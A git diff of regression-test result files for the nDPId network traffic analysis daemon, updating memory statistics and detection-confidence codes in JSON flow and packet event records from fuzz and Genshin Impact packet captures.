+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998585019,"flow_last_seen":1528998585019,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":22544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998636010,"flow_last_seen":1528998636010,"flow_idle_time":620000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","l4_proto":37,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998636010,"flow_last_seen":1528998636010,"flow_idle_time":620000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","l4_proto":37,"flow_datalink":1,"flow_max_packets":3} 
00581{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","packets-captured":366,"packets-processed":301,"total-skipped-flows":0,"total-l4-payload-len":129798,"total-not-detected-flows":19,"total-guessed-flows":3,"total-detected-flows":57,"total-detection-updates":0,"total-updates":13,"current-active-flows":0,"total-active-flows":79,"total-idle-flows":79,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":482,"global_ts_msec":1528998643334} @@ -488,9 +488,9 @@ ~~ total active/idle flows...: 79/79 ~~ total timeout flows.......: 13 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5960768 bytes -~~ total memory freed........: 5960768 bytes -~~ total allocations/frees...: 118724/118724 +~~ total memory allocated....: 6094402 bytes +~~ total memory freed........: 6094402 bytes +~~ total allocations/frees...: 121486/121486 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 201 chars ~~ json string max len.......: 1566 chars diff --git a/test/results/fuzz-2021-06-07-c6c72a0a56.pcap.out b/test/results/fuzz-2021-06-07-c6c72a0a56.pcap.out index 997f3a41f..1f6f3b4da 100644 --- a/test/results/fuzz-2021-06-07-c6c72a0a56.pcap.out +++ b/test/results/fuzz-2021-06-07-c6c72a0a56.pcap.out @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 0/0 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5868383 bytes -~~ total memory freed........: 5868383 bytes -~~ total allocations/frees...: 118110/118110 +~~ total memory allocated....: 6002017 bytes +~~ total memory freed........: 6002017 bytes +~~ total allocations/frees...: 120872/120872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 229 chars ~~ json string max len.......: 577 chars 
diff --git a/test/results/fuzz-2021-10-13.pcap.out b/test/results/fuzz-2021-10-13.pcap.out index b947b92fd..bc61a457e 100644 --- a/test/results/fuzz-2021-10-13.pcap.out +++ b/test/results/fuzz-2021-10-13.pcap.out @@ -11,9 +11,9 @@ ~~ total active/idle flows...: 0/0 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5868383 bytes -~~ total memory freed........: 5868383 bytes -~~ total allocations/frees...: 118110/118110 +~~ total memory allocated....: 6002017 bytes +~~ total memory freed........: 6002017 bytes +~~ total allocations/frees...: 120872/120872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 208 chars ~~ json string max len.......: 561 chars diff --git a/test/results/genshin-impact.pcap.out b/test/results/genshin-impact.pcap.out index 2b952e68e..ca529a078 100644 --- a/test/results/genshin-impact.pcap.out +++ b/test/results/genshin-impact.pcap.out 
@@ -2,45 +2,45 @@ 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"genshin-impact.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1615497372822} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1615497372822,"flow_last_seen":1615497372822,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1615497372822,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.245.143.85","src_port":58766,"dst_port":22101,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1615497372822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1615497372822,"pkt":"eJS0JASgYDjgxTWgCABFAAAwrR4AAD8RTEjAqAJkL\/WPVeWOVlUAHPQTAAAA\/wAAAAAAAAAASZYC0v\/\/\/\/8="} 
-00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1615497372822,"flow_last_seen":1615497372822,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1615497372822,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.245.143.85","src_port":58766,"dst_port":22101,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1615497372822,"flow_last_seen":1615497372822,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1615497372822,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.245.143.85","src_port":58766,"dst_port":22101,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1615497372843,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1615497372843,"pkt":"YDjgxTWgeJS0JASgCABFAAAwK09AADcRlhcv9Y9VwKgCZFZV5Y4AHKXfAAABRQADGDI6DaIVSZYC0hRRRUU="} 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1615497372883,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1615497372883,"pkt":"eJS0JASgYDjgxTWgCABFAADFrx4AAD8RSbPAqAJkL\/WPVeWOVlUAsVF7MhgDABWiDTpRAAABg6QlIwAAAAAAAAAAUQAAAOjKqWZw7UqL9Yt3c0eSZwkZnnlWAs83g1p8EKxdCAGrvC1rqvpVXt+DS9GDIp59mUEo7M9A0R8PnQy3bk3e+QGIcWRmxHcBqUQOH+f\/uJk3ozIYAwAVog06UQAAAYOkJSMBAAAAAAAAACAAAADoyqkGcO9Ki\/W6d3BfbJ9hSIrPxLFWnBNUYf2O83uxMA=="} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":16,"source":"genshin-impact.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":4307,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1617969465739} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1617969465739,"flow_last_seen":1617969465739,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1617969465739,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.254.169.109","src_port":59145,"dst_port":22102,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1617969465739,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1617969465739,"pkt":"eJS0JASgYDjgxTWgCABFAAAwIDwAAD8RvwnAqAJkL\/6pbecJVlYAHFkOAAAA\/wAAAAC6msTNSZYC0v\/\/\/\/8="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1617969465739,"flow_last_seen":1617969465739,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1617969465739,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.254.169.109","src_port":59145,"dst_port":22102,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1617969465739,"flow_last_seen":1617969465739,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1617969465739,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.254.169.109","src_port":59145,"dst_port":22102,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1617969465761,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1617969465761,"pkt":"YDjgxTWgeJS0JASgCABFAAAwmj1AADcRDQgv\/qltwKgCZFZW5wkAHNyDAAABRQACIqy6msTNSZYC0hRRRUU="} 00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1617969465796,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"thread_ts_msec":1617969465796,"pkt":"eJS0JASgYDjgxTWgCABFAACLETwAAD8Rza7AqAJkL\/6pbecJVlYAd4PurCICAM3EmrpRAAABbMl+tgAAAAAAAAAAUwAAAOjKqWZw60qL9Yt3tYWQf\/bh4A8CmEwZmVNWIKRXCgqptAdyiLYHXIWEStbbdMV+nhEs6cNA1hYEnQ\/rbBPfqVmPcWA0wHkHrhALTrzN2JnmCbMb"} 
-00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1615497372822,"flow_last_seen":1615497374454,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1181,"flow_tot_l4_payload_len":4307,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1617969467485,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.245.143.85","src_port":58766,"dst_port":22101,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} +00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1615497372822,"flow_last_seen":1615497374454,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1181,"flow_tot_l4_payload_len":4307,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1617969467485,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.245.143.85","src_port":58766,"dst_port":22101,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 
00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","packets-captured":31,"packets-processed":30,"total-skipped-flows":0,"total-l4-payload-len":6297,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1618759616491} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618759616491,"flow_last_seen":1618759616491,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1618759616491,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"8.209.69.191","src_port":52575,"dst_port":22101,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1618759616491,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1618759616491,"pkt":"eJS0JASgYDjgxTWgCABFAAAwGRQAAD8RUQ3AqAJkCNFFv81fVlUAHHz9AAAA\/wAAAAAAAAAASZYC0v\/\/\/\/8="} 
-00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618759616491,"flow_last_seen":1618759616491,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1618759616491,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"8.209.69.191","src_port":52575,"dst_port":22101,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618759616491,"flow_last_seen":1618759616491,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1618759616491,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"8.209.69.191","src_port":52575,"dst_port":22101,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1618759616511,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1618759616511,"pkt":"YDjgxTWgeJS0JASgCABFAAAwBJVAADYRLowI0UW\/wKgCZFZVzV8AHCclAAABRQAC8VwSg\/gZSZYC0hRRRUU="} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1618759616572,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1618759616572,"pkt":"eJS0JASgYDjgxTWgCABFAADFKAcAAD8RQYXAqAJkCNFFv81fVlUAsRpMXPECABn4gxJRAAAB+IeX5QAAAAAAAAAAUQAAAOjKqWZw7UqL9Yt3c0eSZxk9sU5aAs83g1pzHa9XCgisvC1r9\/0GCIzdTdWOJM16x0h+u8IR0UsPmVrqPkXeqgnccmMxz3oCrkMOS+f\/uJk3o1zxAgAZ+IMSUQAAAfiHl+UBAAAAAAAAACAAAADoyqkGcO9Ki\/W6d3BffbtOf4bPxP18xxJUYUezQnixMA=="} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1617969465739,"flow_last_seen":1617969467485,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":608,"flow_tot_l4_payload_len":1990,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1618759618761,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.254.169.109","src_port":59145,"dst_port":22102,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1617969465739,"flow_last_seen":1617969467485,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":608,"flow_tot_l4_payload_len":1990,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1618759618761,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.254.169.109","src_port":59145,"dst_port":22102,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":46,"source":"genshin-impact.pcap","alias":"nDPId-test","packets-captured":46,"packets-processed":45,"total-skipped-flows":0,"total-l4-payload-len":8942,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":3,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":22,"global_ts_msec":1650541441246} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1650541441246,"flow_last_seen":1650541441246,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1650541441246,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.190.178","src_port":39822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1650541441246,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1650541441246,"pkt":"eJS0JASgYDjgxTWgCABFAAA8hmVAAD8GAmXAqAJkMTO+spuOAFDYKxQrAAAAAKAC\/\/\/VsQAAAgQFtAQCCAoNnimHAAAAAAEDAwk="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1650541441413,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650541441413,"pkt":"YDjgxTWgeJS0JASgCABFAAA0AABAAC4GmdIxM76ywKgCZABQm44lLXPY2CsULIAScUgpvgAAAgQFhgEBBAIBAwMC"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1650541441416,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1650541441416,"pkt":"eJS0JASgYDjgxTWgCABFAAAohmZAAD8GAnjAqAJkMTO+spuOAFDYKxQsJS1z2VAQAKza+QAA"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650541441246,"flow_last_seen":1650541441416,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1650541441416,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.190.178","src_port":39822,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} -00822{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":61,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1618759616491,"flow_last_seen":1618759618761,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":606,"flow_tot_l4_payload_len":2645,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1650541441932,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"8.209.69.191","src_port":52575,"dst_port":22101,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650541441246,"flow_last_seen":1650541441416,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1650541441416,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.190.178","src_port":39822,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 
+00822{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":61,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1618759616491,"flow_last_seen":1618759618761,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":606,"flow_tot_l4_payload_len":2645,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1650541441932,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"8.209.69.191","src_port":52575,"dst_port":22101,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":61,"source":"genshin-impact.pcap","alias":"nDPId-test","packets-captured":61,"packets-processed":60,"total-skipped-flows":0,"total-l4-payload-len":10917,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":4,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1650813582412} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1650813582412,"flow_last_seen":1650813582412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1650813582412,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"49.51.181.168","src_port":39686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
